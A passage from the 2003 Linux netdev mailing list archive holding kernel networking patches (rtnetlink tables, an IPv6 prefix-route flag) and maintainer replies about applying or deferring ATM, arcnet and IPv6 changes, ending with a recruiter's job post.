dev = dev->next, idx++) { + if (idx < s_idx) + continue; + if ((in_dev = in_dev_get(dev)) == NULL) + continue; + err = inet_fill_ifinfo(skb, dev, in_dev, RTM_NEWLINK, NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq); + in_dev_put(in_dev); + if (err <= 0) + break; + } + read_unlock(&dev_base_lock); + cb->args[0] = idx; + + return skb->len; +} + + static struct rtnetlink_link inet_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { - [4] = { .doit = inet_rtm_newaddr, }, - [5] = { .doit = inet_rtm_deladdr, }, - [6] = { .dumpit = inet_dump_ifaddr, }, - [8] = { .doit = inet_rtm_newroute, }, - [9] = { .doit = inet_rtm_delroute, }, - [10] = { .doit = inet_rtm_getroute, .dumpit = inet_dump_fib, }, + [RTM_GETLINK - RTM_BASE] = { .dumpit = inet_dump_ifinfo, }, + [RTM_NEWADDR - RTM_BASE] = { .doit = inet_rtm_newaddr, }, + [RTM_DELADDR - RTM_BASE] = { .doit = inet_rtm_deladdr, }, + [RTM_GETADDR - RTM_BASE] = { .dumpit = inet_dump_ifaddr, }, + [RTM_NEWROUTE - RTM_BASE] = { .doit = inet_rtm_newroute, }, + [RTM_DELROUTE - RTM_BASE] = { .doit = inet_rtm_delroute, }, + [RTM_GETROUTE - RTM_BASE] = { .doit = inet_rtm_getroute, .dumpit = inet_dump_fib, }, #ifdef CONFIG_IP_MULTIPLE_TABLES - [16] = { .doit = inet_rtm_newrule, }, - [17] = { .doit = inet_rtm_delrule, }, - [18] = { .dumpit = inet_dump_rules, }, + [RTM_NEWRULE - RTM_BASE] = { .doit = inet_rtm_newrule, }, + [RTM_DELRULE - RTM_BASE] = { .doit = inet_rtm_delrule, }, + [RTM_GETRULE - RTM_BASE] = { .dumpit = inet_dump_rules, }, #endif }; From davem@redhat.com Sun Jul 20 21:57:49 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 21:58:02 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L4vmFl005357 for ; Sun, 20 Jul 2003 21:57:48 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA07148; Sun, 20 Jul 2003 21:46:53 -0700 Date: Sun, 20 Jul 2003 21:46:53 -0700 From: "David S. Miller" To: kuznet@ms2.inr.ac.ru Cc: krkumar@us.ibm.com, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.4.21 Message-Id: <20030720214653.2de7ce82.davem@redhat.com> In-Reply-To: <200307210155.FAA31320@dub.inr.ac.ru> References: <3F17245D.9040806@us.ibm.com> <200307210155.FAA31320@dub.inr.ac.ru> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4200 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 21 Jul 2003 05:55:04 +0400 (MSD) kuznet@ms2.inr.ac.ru wrote: > The patch is not quite complete: except for those two questions, > I forgot to add MTU truncated to its IPv4 value, did nothing > for multicast things (I still cannot figure out, what information is > really useful) and did not add active notifications which would be good > to be made after sysctl parameters are changed. Please let us to use some portable types instead of 'int' :-) It is just minor nit, I otherwise like the whole idea. Why are we limited to arrays of 'u32' or whatever? RTA_PUT() can place arbitrary things into the message and length is given. From davem@redhat.com Mon Jul 21 01:59:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 01:59:48 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6L8xdFl017345 for ; Mon, 21 Jul 2003 01:59:40 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id BAA00853; Mon, 21 Jul 2003 01:57:40 -0700 Date: Mon, 21 Jul 2003 01:57:39 -0700 From: "David S. Miller" To: James Morris Cc: sneakums@zork.net, netdev@oss.sgi.com Subject: Re: [PATCH] correct 'discvovery' typo Message-Id: <20030721015739.49ee1ce2.davem@redhat.com> In-Reply-To: References: <6ubrvo7v51.fsf@zork.zork.net> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4201 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 21 Jul 2003 11:02:35 +1000 (EST) James Morris wrote: > On Sun, 20 Jul 2003, Sean Neakums wrote: > > > Against 2.6.0-test1. > > Applied to bk://kernel.bkbits.net/jmorris/net-2.5 Pulled, thanks James. From davem@redhat.com Mon Jul 21 05:20:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:20:30 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCK9Fl001459 for ; Mon, 21 Jul 2003 05:20:10 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01714; Mon, 21 Jul 2003 05:17:33 -0700 Date: Mon, 21 Jul 2003 05:17:33 -0700 From: "David S. Miller" To: Krishna Kumar Cc: yoshfuji@linux-ipv6.org, kuznet@ms2.inr.ac.ru, netdev@oss.sgi.com, linux-net@vger.kernel.org, krkumar@us.ibm.com Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 Message-Id: <20030721051733.2f2e9fb7.davem@redhat.com> In-Reply-To: References: <20030718.004701.11546819.yoshfuji@linux-ipv6.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4202 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 17:37:18 -0700 (PDT) Krishna Kumar wrote: > ------------------- Patch for prefix list against 2.5.73 ------------ Ok, I tried to apply this, but it had lots of rejects, here is why. > diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c > --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 > +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 ... > @@ -1330,7 +1330,8 @@ > } > } else if (pinfo->onlink && valid_lft) { > addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, The "pinfo->onlink" part of this if test does not exist in the sources, so patch application failed. You're mixing this patch up with other changes in your tree already. Please repatch against current 2.6.x sources. Thanks. From davem@redhat.com Mon Jul 21 05:26:25 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:26:39 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCQPFl004204 for ; Mon, 21 Jul 2003 05:26:25 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01753; Mon, 21 Jul 2003 05:24:16 -0700 Date: Mon, 21 Jul 2003 05:24:16 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM] minor cleanups for 2.5 Message-Id: <20030721052416.3ef97f3b.davem@redhat.com> In-Reply-To: <200307162120.h6GLKWsG023003@ginger.cmf.nrl.navy.mil> References: <200307162120.h6GLKWsG023003@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4203 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 17:18:04 -0400 chas williams wrote: > (and how does __inline__ work > when its the timer function?) If you take the address of a function marked inline, gcc outputs a non-inline of the function. All of your ATM patches applied, thanks Chas. From davem@redhat.com Mon Jul 21 05:27:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:28:00 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCRkFl004573 for ; Mon, 21 Jul 2003 05:27:46 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01774; Mon, 21 Jul 2003 05:25:52 -0700 Date: Mon, 21 Jul 2003 05:25:52 -0700 From: "David S. Miller" To: "David S. Miller" Cc: netdev@oss.sgi.com, linux-net@vger.kernel.org, zwane@arm.linux.org.uk Subject: Re: Fw: [PATCH][2.6] propogate rx errors from raw_rcv_skb Message-Id: <20030721052552.7536fccc.davem@redhat.com> In-Reply-To: <20030716195345.21b9b9fc.davem@redhat.com> References: <20030716195345.21b9b9fc.davem@redhat.com> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4204 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Wed, 16 Jul 2003 19:53:45 -0700 "David S. Miller" wrote: > This looks somewhat sane, ipv6 doesn't seem to need it as it > always returns 0 Nothing that calls raw_rcv() checks the return value, so what's the point? From davem@redhat.com Mon Jul 21 05:32:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:32:18 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCW2Fl005124 for ; Mon, 21 Jul 2003 05:32:03 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01807; Mon, 21 Jul 2003 05:30:02 -0700 Date: Mon, 21 Jul 2003 05:30:02 -0700 From: "David S. Miller" To: chas williams Cc: netdev@oss.sgi.com Subject: Re: [PATCH][2.4] more atm backports for 2.4 Message-Id: <20030721053002.2051b791.davem@redhat.com> In-Reply-To: <200307141630.h6EGUDmZ007717@locutus.cmf.nrl.navy.mil> References: <200307141630.h6EGUDmZ007717@locutus.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4205 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev Chas, Marcelo is closing the door on anything but critical bug fixes for 2.4.22 so we'll have to defer this next batch of 2.4.x ATM backports to 2.4.23-pre1. From davem@redhat.com Mon Jul 21 05:33:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 05:33:44 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LCXVFl005494 for ; Mon, 21 Jul 2003 05:33:31 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id FAA01818; Mon, 21 Jul 2003 05:31:25 -0700 Date: Mon, 21 Jul 2003 05:31:25 -0700 From: "David S. Miller" To: Christoph Hellwig Cc: netdev@oss.sgi.com Subject: Re: [PATCH] fix arcnet module refcounting Message-Id: <20030721053125.2d28d233.davem@redhat.com> In-Reply-To: <20030713125748.GA24403@lst.de> References: <20030713125748.GA24403@lst.de> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4206 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Sun, 13 Jul 2003 14:57:48 +0200 Christoph Hellwig wrote: > struct arnet_local needs a struct module *owner, that also cleans > up nicely lots of the code. Applied, thanks Christoph. From chas@locutus.cmf.nrl.navy.mil Mon Jul 21 08:04:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 08:04:11 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LF43Fl014638 for ; Mon, 21 Jul 2003 08:04:04 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6LF3xsG012085; Mon, 21 Jul 2003 11:03:59 -0400 (EDT) Message-Id: <200307211503.h6LF3xsG012085@ginger.cmf.nrl.navy.mil> To: "David S. Miller" cc: netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][2.4] more atm backports for 2.4 In-reply-to: Your message of "Mon, 21 Jul 2003 05:30:02 PDT." <20030721053002.2051b791.davem@redhat.com> Date: Mon, 21 Jul 2003 11:01:26 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4207 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030721053002.2051b791.davem@redhat.com>,"David S. Miller" writes: >Chas, Marcelo is closing the door on anything but critical bug fixes >for 2.4.22 so we'll have to defer this next batch of 2.4.x ATM >backports to 2.4.23-pre1. how about the fix for the config file mess? From chas@locutus.cmf.nrl.navy.mil Mon Jul 21 08:06:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 08:06:11 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LF66Fl015062 for ; Mon, 21 Jul 2003 08:06:07 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6LF63sG012139; Mon, 21 Jul 2003 11:06:03 -0400 (EDT) Message-Id: <200307211506.h6LF63sG012139@ginger.cmf.nrl.navy.mil> To: "David S. Miller" cc: netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][ATM] minor cleanups for 2.5 In-reply-to: Your message of "Mon, 21 Jul 2003 05:24:16 PDT." <20030721052416.3ef97f3b.davem@redhat.com> Date: Mon, 21 Jul 2003 11:03:30 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4208 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030721052416.3ef97f3b.davem@redhat.com>,"David S. Miller" writes: >> (and how does __inline__ work >> when its the timer function?) > >If you take the address of a function marked inline, >gcc outputs a non-inline of the function. i figured that. tagging this function inline is essentially pointless. (which was sort of my point in a roundabout way) From davem@redhat.com Mon Jul 21 08:18:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 08:18:26 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LFIDFl016272 for ; Mon, 21 Jul 2003 08:18:13 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id IAA04689; Mon, 21 Jul 2003 08:16:03 -0700 Date: Mon, 21 Jul 2003 08:16:03 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][2.4] more atm backports for 2.4 Message-Id: <20030721081603.529b4c58.davem@redhat.com> In-Reply-To: <200307211503.h6LF3xsG012085@ginger.cmf.nrl.navy.mil> References: <20030721053002.2051b791.davem@redhat.com> <200307211503.h6LF3xsG012085@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4209 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Mon, 21 Jul 2003 11:01:26 -0400 chas williams wrote: > In message <20030721053002.2051b791.davem@redhat.com>,"David S. Miller" writes: > >Chas, Marcelo is closing the door on anything but critical bug fixes > >for 2.4.22 so we'll have to defer this next batch of 2.4.x ATM > >backports to 2.4.23-pre1. > > how about the fix for the config file mess? I pushed that one, don't worry. From krkumar@us.ibm.com Mon Jul 21 10:20:02 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 10:20:09 -0700 (PDT) Received: from e32.co.us.ibm.com (e32.co.us.ibm.com [32.97.110.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6LHK1Fl006734 for ; Mon, 21 Jul 2003 10:20:02 -0700 Received: from westrelay04.boulder.ibm.com (westrelay04.boulder.ibm.com [9.17.193.32]) by e32.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6LHIvUj260134; Mon, 21 Jul 2003 13:18:59 -0400 Received: from DYN318430.beaverton.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay04.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6LHIslm138830; Mon, 21 Jul 2003 11:18:55 -0600 Date: Mon, 21 Jul 2003 10:16:58 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: "David S. Miller" cc: yoshfuji@linux-ipv6.org, , , , Subject: Re: [PATCH 2/2] Prefix List and O/M flags against 2.5.73 In-Reply-To: <20030721051733.2f2e9fb7.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4210 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > Ok, I tried to apply this, but it had lots of rejects, here > is why. > > > diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c > > --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 > > +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 16:59:17.000000000 -0700 > ... > > @@ -1330,7 +1330,8 @@ > > } > > } else if (pinfo->onlink && valid_lft) { > > addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, > > The "pinfo->onlink" part of this if test does not exist > in the sources, so patch application failed. > > You're mixing this patch up with other changes in your > tree already. The problem happened since the patch was against 2.5.73, and this line seems to have been changed sometime after that before 2.6.0. Following is the prefix list (only) patch against 2.6.0-test1 bits. Thanks, - KK ------------------------------------------------------------------------------- diff -ruN linux-2.6.0-test1.org/include/linux/ipv6_route.h linux-2.6.0-test1.new/include/linux/ipv6_route.h --- linux-2.6.0-test1.org/include/linux/ipv6_route.h 2003-07-13 20:31:50.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/ipv6_route.h 2003-07-21 09:50:54.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.6.0-test1.org/include/linux/rtnetlink.h linux-2.6.0-test1.new/include/linux/rtnetlink.h --- linux-2.6.0-test1.org/include/linux/rtnetlink.h 2003-07-13 20:37:13.000000000 -0700 +++ linux-2.6.0-test1.new/include/linux/rtnetlink.h 2003-07-21 09:51:29.000000000 -0700 @@ -168,6 +168,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.6.0-test1.org/net/ipv6/addrconf.c linux-2.6.0-test1.new/net/ipv6/addrconf.c --- linux-2.6.0-test1.org/net/ipv6/addrconf.c 2003-07-13 20:38:06.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/addrconf.c 2003-07-21 09:56:19.000000000 -0700 @@ -130,7 +130,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct inet6_ifaddr *ifp); +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags); static void addrconf_dad_timer(unsigned long data); static void addrconf_dad_completed(struct inet6_ifaddr *ifp); static void addrconf_rs_timer(unsigned long data); @@ -716,7 +716,7 @@ ift->prefered_lft = tmp_prefered_lft; ift->tstamp = ifp->tstamp; spin_unlock_bh(&ift->lock); - addrconf_dad_start(ift); + addrconf_dad_start(ift, 0); in6_ifa_put(ift); in6_dev_put(idev); out: @@ -1249,7 +1249,7 @@ rtmsg.rtmsg_dst_len = 8; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; rtmsg.rtmsg_ifindex = dev->ifindex; - rtmsg.rtmsg_flags = RTF_UP|RTF_ADDRCONF; + rtmsg.rtmsg_flags = RTF_UP; rtmsg.rtmsg_type = RTMSG_NEWROUTE; ip6_route_add(&rtmsg, NULL, NULL); } @@ -1276,7 +1276,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1369,7 +1369,7 @@ } } else if (valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1415,7 +1415,7 @@ } update_lft = create = 1; - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp) { @@ -1588,7 +1588,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1763,7 +1763,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -2002,8 +2002,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -2017,7 +2016,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -2027,7 +2026,8 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, + flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); diff -ruN linux-2.6.0-test1.org/net/ipv6/route.c linux-2.6.0-test1.new/net/ipv6/route.c --- linux-2.6.0-test1.org/net/ipv6/route.c 2003-07-13 20:36:42.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/route.c 2003-07-21 09:58:11.000000000 -0700 @@ -1452,13 +1452,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1539,10 +1546,17 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1690,7 +1704,7 @@ &fl.fl6_dst, &fl.fl6_src, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1716,7 +1730,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From tiffanyg@ix.netcom.com Mon Jul 21 19:14:34 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 21 Jul 2003 19:14:40 -0700 (PDT) Received: from dewey.paralynx.net (dewey.mindlink.net [204.174.16.4]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6M2ERFl021671 for ; Mon, 21 Jul 2003 19:14:34 -0700 Received: from [65.219.25.34] (helo=tiffany) by dewey.paralynx.net with smtp (Exim 4.20) id 19emfT-0005SB-SJ for netdev@oss.sgi.com; Mon, 21 Jul 2003 19:14:20 -0700 From: "Tiffany Goodyear" To: Subject: Looking for some Strong Engineers Date: Mon, 21 Jul 2003 19:14:05 -0700 Message-ID: <012e01c34ff6$eee77080$6401a8c0@cablerocket.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal X-archive-position: 4211 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: tiffanyg@ix.netcom.com Precedence: bulk X-list: netdev Hello all, My name is Tiffany Goodyear and I am helping a start-up company in San Jose find a Distributed File System Engineer and a few Senior Kernel Engineers. They are a small, well funded startup company working to build the next generation storage product. 